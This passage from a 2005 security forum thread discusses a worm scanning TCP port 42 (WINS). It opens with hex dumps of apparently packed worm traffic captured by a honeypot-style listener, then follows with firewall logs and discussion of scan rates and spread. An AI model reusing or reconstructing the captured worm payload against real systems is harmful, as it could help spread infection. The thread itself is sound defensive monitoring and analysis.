0580 FC 37 96 48 97 9F 45 97 FD F8 92 27 98 92 F9 43 .7.H..E....'...C
0590 93 49 2F FD 41 92 41 93 4B 45 F5 37 99 95 27 49 .I/.A.A.KE.7..'I
05A0 4D 3F 41 92 93 46 49 43 2F 95 99 43 FD 99 47 41 M?A..FIC/..C..GA
05B0 47 F8 FC 4D G..M

---- Echoed Data

68.144.235.53 : 3365 TCP Data In Length 1460 bytes
MD5 = 0AEAF79F17C8E790F8A642B1466A2364
---- 03/01/2005 16:35:44.275
0000 F5 93 4D 95 F5 47 90 2F F9 27 47 F9 41 96 4A 90 ..M..G./.'G.A.J.
0010 95 FD 2F 49 F9 97 FD 98 92 F9 2F 47 F9 FC 4E 41 ../I....../G..NA
0020 F9 98 43 43 3F 4D 4A 3F 4A 37 9F 46 92 95 2F 46 ..CC?MJ?J7.F../F
0030 2F 95 98 97 F8 4F FD 4F 99 40 FD FC 4E 45 95 3F /....O.O.@..NE.?
0040 3F 4D 46 93 42 4B 49 9F F5 49 37 9E 37 90 4B 27 ?MF.BKI..I7.7.K'
0050 3F F8 48 99 F8 90 98 45 90 96 92 48 93 4B 45 42 ?.H....E...H.KEB
0060 4B F9 93 F5 49 98 43 99 46 27 46 F8 2F 91 4D 4D K...I.C.F'F./.MM
0070 F5 4F 90 48 45 92 4B 4F 99 41 F8 46 48 43 92 FC .O.HE.KO.A.FHC..
0080 95 49 27 4D 48 99 FC 4D 40 43 42 40 45 43 FD 96 .I'MH..M@CB@EC..
0090 91 F5 F8 F8 48 92 F9 49 27 4D 92 FC 43 92 41 37 ....H..I'M..C.A7
00A0 FD 4F 46 F5 96 42 F9 48 4B 92 3F 4D 27 43 4F 3F .OF..B.HK.?M'CO?
00B0 3F 4F 92 45 FD 48 42 96 90 45 9F 4B 4E 92 41 F8 ?O.E.HB..E.KN.A.
00C0 93 93 46 96 96 92 4A 37 49 4E 4A 40 48 FD 93 96 ..F...J7INJ@H...
00D0 41 4F 4F 2F 43 9F 96 F5 41 92 49 FD 4D 45 43 90 AOO/C...A.I.MEC.
00E0 96 4A FC 92 48 90 97 43 F5 49 92 95 F8 2F 99 47 .J..H..C.I.../.G
00F0 4B 4B 4D 37 47 41 3F 4E F5 46 4A 2F 96 92 F9 46 KKM7GA?N.FJ/...F
0100 37 93 45 47 2F 46 4F 2F 41 47 46 92 F9 49 90 41 7.EG/FO/AGF..I.A
0110 91 98 F5 37 F5 41 40 97 46 4B F8 49 45 45 90 27 ...7.A@.FK.IEE.'
0120 FC 96 FC 99 FC 4F 93 4E 90 91 95 4A 91 9E F9 F8 .....O.N...J....
0130 27 97 F5 4E F5 9F 2F 96 F8 46 48 49 3F 93 95 4E '..N../..FHI?..N
0140 4E F5 99 27 FC 90 49 99 99 92 FD 9F 99 43 41 92 N..'..I......CA.
0150 F9 49 4B 97 2F FD 4F 98 4A 41 4B FC 27 F9 4D 2F .IK./.O.JAK.'.M/
0160 3F 37 FC 98 41 47 91 97 9E F5 47 9F 41 40 90 49 ?7..AG....G.A@.I
0170 F9 40 27 4E 93 91 42 42 2F 90 45 FC 90 48 49 93 .@'N..BB/.E..HI.
0180 46 95 27 95 41 37 27 93 4E 2F 47 45 4A 90 98 37 F.'.A7'.N/GEJ..7
0190 F9 27 48 42 45 42 4E 93 98 9F 27 3F 40 45 4B 97 .'HBEBN...'?@EK.
01A0 4A 45 4F 97 4B 4A 4B 4A 42 9F 4B 27 92 43 4E 4D JEO.KJKJB.K'.CNM
01B0 37 98 91 41 4A 46 4A 95 4A 95 40 FC F8 42 90 42 7..AJFJ.J.@..B.B
01C0 43 47 43 45 93 45 4F 46 37 4F 99 FC 98 F9 3F 4E CGCE.EOF7O....?N
01D0 49 4B F8 27 FD 90 2F 4F 41 4F 4A 3F 9F 98 99 95 IK.'../OAOJ?....
01E0 45 27 37 99 48 27 43 F9 98 9F 97 9F 98 F8 90 93 E'7.H'C.........
01F0 4B 4D FD 9F 43 90 3F 4E 97 93 45 9F 46 45 92 92 KM..C.?N..E.FE..
0200 99 F8 4E F9 95 92 43 49 48 FD 4E 95 91 40 43 4B ..N...CIH.N..@CK
0210 46 4D 91 F5 98 48 4D 99 91 43 41 4A 98 49 4B F8 FM...HM..CAJ.IK.
0220 27 3F 91 41 9F 48 90 4A 93 40 FC 93 98 99 45 F9 '?.A.H.J.@....E.
0230 43 92 F9 F5 3F 91 FD 46 4E 91 3F 27 47 47 F8 47 C...?..FN.?'GG.G
0240 F5 4A 97 95 F9 4D 96 96 99 48 49 FC F5 F8 9E 98 .J...M...HI.....
0250 90 49 41 49 27 95 F5 42 96 27 42 42 F8 95 95 45 .IAI'..B.'BB...E
0260 F5 95 91 4F 4B 97 92 F9 9E 42 41 47 43 3F F5 4B ...OK....BAGC?.K
0270 92 F9 F5 42 40 F8 3F 41 45 96 97 42 9E 3F 43 2F ...B@.?AE..B.?C/
0280 37 9F 46 40 F5 41 92 37 3F 95 92 42 98 92 98 3F 7.F@.A.7?..B...?
0290 48 48 F5 4F 45 43 FC 3F 45 4D FC F9 97 F5 43 F5 HH.OEC.?EM....C.
02A0 2F 41 FD 95 F8 F5 99 48 91 F8 4F 9E F9 48 F9 97 /A.....H..O..H..
02B0 91 F9 96 F9 4F 46 90 98 4B 95 4E 40 93 F8 97 27 ....OF..K.N@...'
02C0 F5 4E F9 45 41 47 4A 90 2F 95 92 3F F5 40 91 93 .N.EAGJ./..?.@..
02D0 4B FC 4F 40 98 F5 48 47 90 43 97 F8 46 47 4A 43 K.O@..HG.C..FGJC
02E0 9F 4D 42 43 F8 4D 4D 48 43 FD 97 F8 4F 9E FD 96 .MBC.MMHC...O...
02F0 99 46 F9 4F 9E 43 46 4F 96 4B 48 42 4E 4A 42 4A .F.O.CFO.KHBNJBJ
0300 F9 98 9E 41 27 9F 91 4A 4F F9 40 97 48 4B 46 42 ...A'..JO.@.HKFB
0310 93 48 92 90 49 2F FD 9E 4D 9E 37 4E 27 F5 4D 9E .H..I/..M.7N'.M.
0320 FD 4E 45 43 4F 90 F9 9E 97 49 9E 40 48 37 47 9F .NECO....I.@H7G.
0330 49 FD 4E 41 93 42 F8 96 90 41 9F 98 9E F9 FD 4F I.NA.B...A.....O
0340 27 42 4A F5 3F 4B 98 97 9F 46 46 42 4B 4D 9F 95 'BJ.?K...FFBKM..
0350 4F 3F 97 97 F8 9F 42 98 93 40 97 2F 4D 49 FC F8 O?....B..@./MI..
0360 92 4B 4F 45 27 FD 43 47 95 F5 99 40 97 42 3F 96 .KOE'.CG...@.B?.
0370 4A F8 41 37 48 9F 4D 48 43 F9 93 41 FD 2F 46 47 J.A7H.MHC..A./FG
0380 41 9F 98 F8 3F F8 4D 90 42 4A FC 99 F8 4A F8 42 A...?.M.BJ...J.B
0390 9F 47 FD FD 97 F8 4E 48 93 4D 46 92 F8 45 4A 45 .G....NH.MF..EJE
03A0 FD 40 98 4F F9 9F 4B 41 46 98 2F 90 99 9E F9 40 .@.O..KAF./....@
03B0 93 F8 91 2F 3F FD 4D FD 40 FC 3F 90 41 98 F5 41 .../?.M.@.?.A..A
03C0 45 3F 46 3F 43 49 46 46 41 FC 48 3F 4D F8 97 9E E?F?CIFFA.H?M...
03D0 4F 41 FC FD 90 9E 95 91 9E 4D 46 93 96 F5 4B 97 OA.......MF...K.
03E0 9F 27 4E FD 27 F8 4E 4A 90 4B 95 3F 4B 49 45 4D .'N.'.NJ.K.?KIEM
03F0 9F 91 9F 46 48 96 4A 95 2F 96 90 4E 4D 9F 90 FD ...FH.J./..NM...
0400 99 96 93 91 27 F8 9F 4E 97 2F 37 3F 91 92 98 97 ....'..N./7?....
0410 40 47 4A 96 4B 96 48 F5 40 43 90 F9 F8 98 93 92 @GJ.K.H.@C......
0420 98 27 48 FC 4B 43 F9 40 48 37 37 93 46 98 F8 95 .'H.KC.@H77.F...
0430 98 98 91 2F 49 9F 2F 40 4E 41 9E 47 3F 47 FC 41 .../I./@NA.G?G.A
0440 46 48 27 27 46 90 9E 27 F5 48 99 91 27 40 4D 4B FH''F..'.H..'@MK
0450 97 4E F8 F5 90 99 F9 F8 9E 27 40 FC 90 99 9E 4F .N.......'@....O
0460 48 2F 40 FC 47 4E 3F 3F 47 91 97 42 93 9F 90 40 H/@.GN??G..B...@
0470 F5 45 92 FC 97 98 91 4A 41 93 48 FC 4D 4A 9F 4F .E.....JA.H.MJ.O
0480 43 46 4B 90 46 96 4D 98 37 F5 99 95 37 45 9F 4F CFK.F.M.7...7E.O
0490 FD 97 2F 9F 93 45 46 41 F8 49 93 48 4B 41 96 9E ../..EFA.I.HKA..
04A0 F9 93 F8 4B 48 99 4B 3F 96 96 F9 99 90 3F FC F5 ...KH.K?.....?..
04B0 99 2F 92 99 45 4A 48 46 4B FC 49 4E 46 97 3F 4A ./..EJHFK.INF.?J
04C0 93 4F 96 4A F8 45 4D 93 F5 96 F9 43 37 37 97 4A .O.J.EM....C77.J
04D0 95 43 4D F8 41 27 4B 2F F9 49 46 98 41 43 F8 91 .CM.A'K/.IF.AC..
04E0 96 47 47 42 46 2F 37 92 2F 98 4B 3F 91 41 40 37 .GGBF/7./.K?.A@7
04F0 37 91 91 48 42 4F 3F 93 FD F5 49 90 97 F9 92 27 7..HBO?...I....'
0500 4E 2F FD 99 46 F5 41 FD 98 37 9E 4B 3F 9E 49 37 N/..F.A..7.K?.I7
0510 43 4F 90 41 40 41 47 98 99 49 41 4D 96 99 97 F5 CO.A@AG..IAM....
0520 95 27 45 F5 90 4D 46 42 37 46 41 4E 95 93 47 F8 .'E..MFB7FAN..G.
0530 4F 98 47 41 99 4B 48 40 3F 43 F8 27 45 92 92 F5 O.GA.KH@?C.'E...
0540 47 49 4F 40 2F 93 40 90 37 27 4A 4E FD F9 99 F9 GIO@/.@.7'JN....
0550 9F 2F 91 2F FC 95 48 27 92 4A 95 F8 48 91 F5 4A ././..H'.J..H..J
0560 FC 90 9F 48 4E 2F 3F 27 97 97 4D 92 99 92 FD 9E ...HN/?'..M.....
0570 96 45 47 4A 27 40 98 46 93 45 41 F5 90 FD 2F FC .EGJ'@.F.EA.../.
0580 45 F8 4F 9F 45 90 27 F5 47 47 F9 90 4F 4B 41 42 E.O.E.'.GG..OKAB
0590 47 98 48 95 9E 4D F5 95 96 48 40 F8 93 4F 93 2F G.H..M...H@..O./
05A0 43 F8 3F F5 3F 97 FC 90 41 98 41 42 93 FD 4A 99 C.?.?...A.AB..J.
05B0 97 45 93 98 .E..

---- Echoed Data
10035: [10035] Operation would block

68.144.235.53 : 3365 TCP Data In Length 1460 bytes
MD5 = 247B7E6F794ED3FDFB354D11FDAD381F
---- 03/01/2005 16:35:44.325
0000 49 F5 F8 FC 48 47 42 4F 99 9F F8 2F 91 2F 99 4A I...HGBO..././.J
0010 41 4E 27 4A 4F 90 F9 41 90 FC 96 91 91 47 27 49 AN'JO..A.....G'I
0020 93 91 4F 91 FD 46 3F 27 2F 45 4F 3F 92 4D 41 FD ..O..F?'/EO?.MA.
0030 49 F8 96 96 99 37 4E 4A 46 47 97 43 91 93 96 9E I....7NJFG.C....
0040 27 3F F5 4E FC 9E F9 93 9E 37 4A 40 91 9F 47 4D '?.N.....7J@..GM
0050 9E 49 48 4E 41 4D 92 95 FD 47 4A 4F 42 43 93 4F .IHNAM...GJOBC.O
0060 4E F8 FC 3F 9F 9F 2F 3F 9F 96 96 41 97 96 90 43 N..?../?...A...C
0070 49 91 9F 37 92 49 4A 4A 46 96 41 FC 93 47 97 FC I..7.IJJF.A..G..
0080 43 9E 3F 9F 99 F8 98 27 97 37 2F 37 FD 4B F8 98 C.?....'.7/7.K..
0090 49 46 FD 92 4A 9E F9 9E 92 95 49 93 9E F9 4B 49 IF..J.....I...KI
00A0 40 4A 2F 4F 27 92 49 46 F9 3F 2F 4A 4F 4E F8 40 @J/O'.IF.?/JON.@
00B0 91 43 98 9F 46 F9 27 97 96 95 40 9F 97 98 9E 98 .C..F.'...@.....
00C0 48 48 96 99 9E 93 43 47 99 F9 4F 96 93 40 9E 93 HH....CG..O..@..
00D0 43 42 90 97 45 98 3F 9E 91 27 F8 41 37 92 96 F5 CB..E.?..'.A7...
00E0 4A 95 9F F8 F5 4F 4D 9E 49 9E F9 41 45 4F 95 49 J....OM.I..AEO.I
00F0 9E 3F 37 92 45 46 4F 48 FC 4D 3F 49 97 F9 97 99 .?7.EFOH.M?I....
0100 9E 41 41 45 95 F9 4E FD 92 4D 95 37 98 48 F9 46 .AAE..N..M.7.H.F
0110 3F F9 F5 9E 96 27 F9 2F 95 F5 46 3F 42 9E FC 49 ?....'./..F?B..I
0120 9F 46 43 48 97 92 47 4E 96 91 FC 90 4F 42 FD 2F .FCH..GN....OB./
0130 98 41 45 90 96 98 92 47 4F FD 96 37 92 48 93 F5 .AE....GO..7.H..
0140 4F FC 91 41 45 4E 4A F8 40 97 4A FC 9F FD 41 4E O..AENJ.@.J...AN
0150 40 41 92 40 92 90 F9 46 FC 96 97 3F 42 41 97 93 @A.@...F...?BA..
0160 95 FC 93 46 49 41 47 48 95 95 4F 98 43 99 98 42 ...FIAGH..O.C..B
0170 2F 92 47 90 42 98 93 F8 FD 48 FD 4E 37 41 45 47 /.G.B....H.N7AEG
0180 42 95 4A 4B 41 90 3F 4D 4D 3F 48 41 9F 43 4D F5 B.JKA.?MM?HA.CM.
0190 4B F5 92 2F 3F 96 49 F9 FC 4B 3F FD 27 F8 4A 2F K../?.I..K?.'.J/
01A0 FD 90 99 9F 95 96 FD 4A 92 FD 99 97 4A F5 98 92 .......J....J...
01B0 46 4B 42 96 46 93 37 3F 93 93 F9 F8 40 91 91 F5 FKB.F.7?....@...
01C0 48 4B 4A 95 2F F8 4A 95 93 27 95 4B FD 92 99 3F HKJ./.J..'.K...?
01D0 9E 92 98 46 4A 46 43 42 45 96 93 27 4B 99 45 42 ...FJFCBE..'K.EB
01E0 41 FD 93 F5 92 97 42 49 45 2F F9 27 47 90 9F 3F A.....BIE/.'G..?
01F0 98 40 98 FC 4A 92 F5 FC 43 48 4B 4E 3F 91 47 96 .@..J...CHKN?.G.
0200 4D 4F 96 9F 4F 48 4D 27 97 9F 91 91 FC 2F 27 91 MO..OHM'...../'.
0210 98 9F 2F 4A 93 98 27 48 41 4A 46 90 93 40 37 42 ../J..'HAJF..@7B
0220 95 3F 9F FC 4D 42 92 F5 92 41 99 2F 9F 41 37 97 .?..MB...A./.A7.
0230 4D 3F 41 48 4A 92 97 43 96 95 48 4E 4B 98 F5 91 M?AHJ..C..HNK...
0240 90 45 91 48 9E 4D 90 9F 4D 45 4F 9E 49 4B 40 45 .E.H.M..MEO.IK@E
0250 43 FD 41 90 9E FC 41 37 45 3F 98 48 49 99 4A 4D C.A...A7E?.HI.JM
0260 47 47 41 FD 9F 9F 46 98 93 99 91 47 4F 4B 95 2F GGA...F....GOK./
0270 4A 4B 91 40 49 9E 90 46 43 47 48 40 90 F9 96 96 JK.@I..FCGH@....
0280 2F 43 47 FD 45 4E 43 91 4A 49 98 47 41 40 FC 45 /CG.ENC.JI.GA@.E
0290 9E 47 46 41 42 42 4D F9 37 99 4D F5 45 4E 4F 9F .GFABBM.7.M.ENO.
02A0 2F 95 99 F9 F9 27 F5 41 9E F5 4E 2F FC 4F 42 4D /....'.A..N/.OBM
02B0 4B 4A 92 4E 90 95 3F F5 4B 96 49 9E 47 FC 4A 2F KJ.N..?.K.I.G.J/
02C0 92 37 95 91 93 37 9E 92 49 99 41 98 91 46 46 4F .7...7..I.A..FFO
02D0 27 F5 27 9F 49 4D 97 37 98 F8 27 FC 98 F8 45 2F '.'.IM.7..'...E/
02E0 45 97 47 98 42 4B 3F F8 F5 95 41 4F 27 FD 4F 4B E.G.BK?...AO'.OK
02F0 99 97 4A 97 27 37 F5 F5 F8 4E 93 9E 40 9F 47 4F ..J.'7...N..@.GO
0300 99 49 FC 4D 37 42 9F 41 46 F9 45 4E 3F 27 9F 95 .I.M7B.AF.EN?'..
0310 FC 45 91 95 45 F9 9E FC 49 FD 4F 4E 27 43 9F 42 .E..E...I.ON'C.B
0320 FD 9E 4A F9 37 95 90 40 91 FD 4B FD 42 4F FC 9E ..J.7..@..K.BO..
0330 2F 37 4A 9F 49 47 37 46 4A 97 93 95 45 FD 93 9E /7J.IG7FJ...E...
0340 9F 3F F5 95 FD 97 46 96 98 F5 47 9E 95 91 92 F9 .?....F...G.....
0350 99 FD 46 91 4F F8 9F 91 4B 9F 27 96 4B FD 4A 90 ..F.O...K.'.K.J.
0360 2F 46 49 46 4E 92 4D 40 FD 4B 48 93 43 9E 9F 43 /FIFN.M@.KH.C..C
0370 98 40 47 92 90 93 48 27 27 4D F8 42 48 37 92 96 .@G...H''M.BH7..
0380 98 4E 4E 95 4A 95 41 90 4D 4F 46 96 F9 F9 2F 93 .NN.J.A.MOF.../.
0390 9F F9 2F F5 48 FD 42 45 9F F9 F8 47 49 9E 4B 92 ../.H.BE...GI.K.
03A0 97 96 2F 40 F8 F9 FC 48 96 3F 3F FC 4A 4E 93 2F ../@...H.??.JN./
03B0 9F 9E 4F 47 F5 41 99 27 97 FD 47 FD F9 91 2F 95 ..OG.A.'..G.../.
03C0 3F 48 FC 43 97 96 99 96 FC FD 4D 4D 93 F5 90 46 ?H.C......MM...F
03D0 3F 43 4A 41 4E 98 F8 40 2F 43 F5 4F F9 95 4D FD ?CJAN..@/C.O..M.
03E0 43 F5 FC 4B 46 37 F5 4D 2F 9F 97 2F 43 F8 98 4D C..KF7.M/../C..M
03F0 FC 3F 46 FC F8 42 46 9F 48 42 92 FC 4F 4D 45 48 .?F..BF.HB..OMEH
0400 37 92 27 9E 47 FC 96 97 91 91 F8 F5 47 97 3F 48 7.'.G.......G.?H
0410 95 46 F5 4F 42 95 4E F9 91 37 47 47 43 43 F9 4B .F.OB.N..7GGCC.K
0420 9E 93 48 49 98 93 90 95 F5 97 40 27 91 9E 3F 49 ..HI......@'..?I
0430 FD F8 F9 9E 42 98 40 41 96 4F 9E 4F 99 40 41 41 ....B.@A.O.O.@AA
0440 40 FD F9 93 3F 4D 91 43 41 47 4A 42 FD F8 42 F9 @...?M.CAGJB..B.
0450 F9 FD 95 95 4F 95 46 43 91 49 96 37 47 4A 3F 46 ....O.FC.I.7GJ?F
0460 4F 4D 97 43 4F 43 95 9F 37 F9 9F 4E 4F 41 2F 37 OM.COC..7..NOA/7
0470 42 37 99 4B 41 43 37 3F 43 93 FC FC 4D 95 45 37 B7.KAC7?C...M.E7
0480 3F 92 3F 93 42 99 FD 96 3F 9E 4A 27 9F 41 4E 40 ?.?.B...?.J'.AN@
0490 99 48 92 F8 93 9E 27 37 4B 97 4B 37 92 93 27 40 .H....'7K.K7..'@
04A0 46 48 4F 42 27 99 4B 40 F9 96 41 F5 4E 41 97 9E FHOB'.K@..A.NA..
04B0 91 98 45 90 46 9E 99 91 49 4A 46 9F 2F 49 F9 41 ..E.F...IJF./I.A
04C0 93 9F 4F 46 42 3F FC 40 F8 F9 F5 2F 4E 99 91 FD ..OFB?.@.../N...
04D0 FC 3F 27 F5 9F 45 45 45 46 47 F9 4E 99 40 F8 47 .?'..EEEFG.N.@.G
04E0 91 4A 46 41 F9 47 43 2F 95 3F 4A 99 FC 42 92 90 .JFA.GC/.?J..B..
04F0 9E 4D 95 99 4F 37 47 3F 4F FD 4B 95 99 48 37 99 .M..O7G?O.K..H7.
0500 45 46 48 9E FC 3F 2F 90 99 47 92 FD 93 2F 46 9E EFH..?/..G.../F.
0510 41 4D 9E 40 93 9E 4D 49 48 4F 97 4A 4D 96 43 FD AM.@..MIHO.JM.C.
0520 9F F9 40 FD 37 42 4D 4F 9F 95 F9 37 41 F9 43 4F ..@.7BMO...7A.CO
0530 2F 42 4E 37 99 41 4D 91 F8 48 3F 91 90 47 98 F8 /BN7.AM..H?..G..
0540 F8 96 9E 4B 4A FC F5 F8 F9 F5 F8 91 47 43 96 41 ...KJ.......GC.A
0550 92 9E 42 4B 4D 95 27 90 99 4D 49 9E 43 F8 95 47 ..BKM.'..MI.C..G
0560 4F 4A 42 4D 4F 4B 45 F8 9E 99 90 41 98 4B FC 4B OJBMOKE....A.K.K
0570 90 48 48 42 9F 27 F5 4B 4F 40 F9 45 37 96 97 F5 .HHB.'.KO@.E7...
0580 98 4D 93 4F 97 42 49 3F 47 92 43 93 27 9E 47 40 .M.O.BI?G.C.'.G@
0590 FC 90 49 42 95 90 45 27 2F 93 47 99 91 FD 96 96 ..IB..E'/.G.....
05A0 F9 F8 95 45 48 FD 47 90 93 46 F9 FD 92 90 47 92 ...EH.G..F....G.
05B0 F9 4E 96 4E .N.N

---- Echoed Data
10054: [10054] Connection reset by peer

TCP Error
---- 03/01/2005 16:35:44.375
Error Code: 10054 Winsock error in recv()

TCP Error
---- 03/01/2005 16:35:44.375
Error Code: 10054 Winsock error in recv()

TCP Error
---- 03/01/2005 16:35:44.385
Error Code: 10054 Winsock error in recv()

TCP Error
---- 03/01/2005 16:35:44.395
Error Code: 10054 Winsock error in recv()

68.144.235.53 : 3365 TCP Disconnected ID = 1
---- 03/01/2005 16:35:44.395
Status Code: 10053 [10053] Software caused connection abort

---------------

Blake



Link Logger
Premium,MVM
join:2001-03-29
Calgary, AB
kudos:3
reply to CrookedSmile

Note 68.144.235.53 attack on TCP Port 42:

Jan 03, 2005 16:26:39.238 - (TCP) 68.144.235.53 : 3365 >>> 192.168.1.35 : 42 (scanned 68.144.238.148 but was forwarded through to 192.168.1.35 which is running PortPeeker)

was also logged on

Jan 03, 2005 16:26:01.828 - (TCP) 68.144.235.53 : 3163 >>> 68.144.238.64 : 42
Jan 03, 2005 16:25:58.828 - (TCP) 68.144.235.53 : 3163 >>> 68.144.238.64 : 42

So it is doing block scans (2.2 IP Addresses per second??).

NOTE I also captured a second capture from a return attack which was very much different (also much much larger) and can be viewed at »www.linklogger.com/TCP42WINS.htm

I suspect the capture above was truncated by a network error as I was feeding him back his data, but the bits are different so it makes me wonder if the attack is polymorphic (ie encrypted or packed differently each time).

Blake
--
Vendor: Firewall Logging Software »www.SonicLogger.com - SonicWall and 3Com »www.LinkLogger.com - Linksys, Netgear and Zyxel


kpatz
MY HEAD A SPLODE
Premium
join:2003-06-13
Manchester, NH

Oh lookee, my first scan on port 42!!

quote:
Jan 4 18:16:51 linux1 kernel: Packet log: input DENY eth0 PROTO=6 24.13.89.92:1265 (My IP):42 L=48 S=0x80 I=54706 F=0x4000 T=112 SYN (#28)
The IP resolves to c-24-13-89-92.client.comcast.net. This IP has never scanned me before.
--
SMTP: Spam and Malware Transfer Protocol. Also used on rare occasion to transmit e-mail messages.


Link Logger
Premium,MVM
join:2001-03-29
Calgary, AB
kudos:3

No port 42 traffic here today. This is a small time worm as there shouldn't be many systems on the internet using WINS, but it is the first new exploit worm in over 6 months however and a real bottom of the barrel scraper at that.

Blake
--
Vendor: Firewall Logging Software »www.SonicLogger.com - SonicWall and 3Com »www.LinkLogger.com - Linksys, Netgear and Zyxel



Name Game
Premium
join:2002-07-07
Grand Rapids, MI
kudos:7

said by Link Logger:

No port 42 traffic here today. This is a small time worm as there shouldn't be many systems on the internet using WINS, but it is the first new exploit worm in over 6 months however and a real bottom of the barrel scraper at that.

Blake
It appears things are slowing down

»isc.sans.org//port_details.php?port=42

I sold my stock before the market crashed.
--
Gladiator Security Forum »www.gladiator-antivirus.com/ Missing Kidshttp://www.missingkids.com/


Link Logger
Premium,MVM
join:2001-03-29
Calgary, AB
kudos:3

1 recommendation

The graph actually says it all, a handful of infected systems scanning lots of other systems.

One of my other IP's did see some port 42 scans this morning from 2 systems in New Jersey.

I have a binary capture of the worm here if anyone wants it to see what all it does to a system.

Blake
--
Vendor: Firewall Logging Software »www.SonicLogger.com - SonicWall and 3Com »www.LinkLogger.com - Linksys, Netgear and Zyxel



Name Game
Premium
join:2002-07-07
Grand Rapids, MI
kudos:7

Thanks Blake for keeping your eye on this one..I am sure if it would have gotten out of hand..you would be one of the first to sound the alert.
--
Gladiator Security Forum »www.gladiator-antivirus.com/ Missing Kidshttp://www.missingkids.com/



Link Logger
Premium,MVM
join:2001-03-29
Calgary, AB
kudos:3

Actually Lawrence Baldwin over at MyNetwatchman gave me the heads up about this one, so then it only takes me a couple of minutes to setup PortPeeker and then from there I wait (actually I setup Link Logger to send me an email when something shows up on the desired port so I know to go and check PortPeeker). So really kudos would be better given to Lawrence and not me on this one.

Blake
--
Vendor: Firewall Logging Software »www.SonicLogger.com - SonicWall and 3Com »www.LinkLogger.com - Linksys, Netgear and Zyxel



Name Game
Premium
join:2002-07-07
Grand Rapids, MI
kudos:7

said by Link Logger:

Actually Lawrence Baldwin over at MyNetwatchman gave me the heads up about this one, so then it only takes me a couple of minutes to setup PortPeeker and then from there I wait (actually I setup Link Logger to send me an email when something shows up on the desired port so I know to go and check PortPeeker). So really kudos would be better given to Lawrence and not me on this one.

Blake
Yup that for sure..:) He is probably out some place getting interviewed. so pass on the coffee and donuts.
--
Gladiator Security Forum »www.gladiator-antivirus.com/ Missing Kidshttp://www.missingkids.com/


Link Logger
Premium,MVM
join:2001-03-29
Calgary, AB
kudos:3

I posted my binary PortPeeker capture in the malware forum if anyone who is authorized to download stuff from there wants it. The only thing I ask is you post your analysis back to this thread.

Blake
--
Vendor: Firewall Logging Software »www.SonicLogger.com - SonicWall and 3Com »www.LinkLogger.com - Linksys, Netgear and Zyxel